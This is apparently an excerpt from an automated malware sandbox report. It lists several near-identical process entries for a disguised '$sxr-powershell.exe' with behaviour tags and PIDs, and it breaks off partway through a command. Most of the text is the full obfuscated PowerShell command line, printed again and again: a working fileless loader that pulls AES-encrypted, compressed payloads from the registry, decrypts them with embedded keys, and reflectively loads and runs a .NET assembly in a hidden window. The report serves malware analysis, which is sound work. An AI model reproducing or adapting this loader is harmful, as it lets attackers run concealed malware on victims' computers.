[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5076
-
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] 